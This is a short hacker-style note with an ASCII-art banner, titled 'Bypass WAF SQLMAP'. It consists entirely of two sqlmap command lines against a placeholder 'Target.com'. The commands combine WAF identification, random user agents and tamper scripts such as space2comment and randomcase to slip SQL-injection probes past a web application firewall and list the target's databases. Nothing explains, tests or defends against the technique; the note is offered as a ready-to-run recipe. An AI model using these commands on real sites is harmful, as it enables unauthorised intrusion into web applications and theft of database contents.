
 ███▄ ▄███▓ ██▀███    ▄████  ██░ ██  ▒█████    ██████ ▄▄▄█████▓  ▄████ ▄▄▄█████▓ ██▀███  
▓██▒▀█▀ ██▒▓██ ▒ ██▒ ██▒ ▀█▒▓██░ ██▒▒██▒  ██▒▒██    ▒ ▓  ██▒ ▓▒ ██▒ ▀█▒▓  ██▒ ▓▒▓██ ▒ ██▒
▓██    ▓██░▓██ ░▄█ ▒▒██░▄▄▄░▒██▀▀██░▒██░  ██▒░ ▓██▄   ▒ ▓██░ ▒░▒██░▄▄▄░▒ ▓██░ ▒░▓██ ░▄█ ▒
▒██    ▒██ ▒██▀▀█▄  ░▓█  ██▓░▓█ ░██ ▒██   ██░  ▒   ██▒░ ▓██▓ ░ ░▓█  ██▓░ ▓██▓ ░ ▒██▀▀█▄  
▒██▒   ░██▒░██▓ ▒██▒░▒▓███▀▒░▓█▒░██▓░ ████▓▒░▒██████▒▒  ▒██▒ ░ ░▒▓███▀▒  ▒██▒ ░ ░██▓ ▒██▒
░ ▒░   ░  ░░ ▒▓ ░▒▓░ ░▒   ▒  ▒ ░░▒░▒░ ▒░▒░▒░ ▒ ▒▓▒ ▒ ░  ▒ ░░    ░▒   ▒   ▒ ░░   ░ ▒▓ ░▒▓░
░  ░      ░  ░▒ ░ ▒░  ░   ░  ▒ ░▒░ ░  ░ ▒ ▒░ ░ ░▒  ░ ░    ░      ░   ░     ░      ░▒ ░ ▒░
░      ░     ░░   ░ ░ ░   ░  ░  ░░ ░░ ░ ░ ▒  ░  ░  ░    ░      ░ ░   ░   ░        ░░   ░ 
       ░      ░           ░  ░  ░  ░    ░ ░        ░                 ░             ░     
                                                                                         
#Bypass WAF SQLMAP

Example:
-sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
-sqlmap -u "Target.com" --identify-waf --random-agent -v 3 --dbs
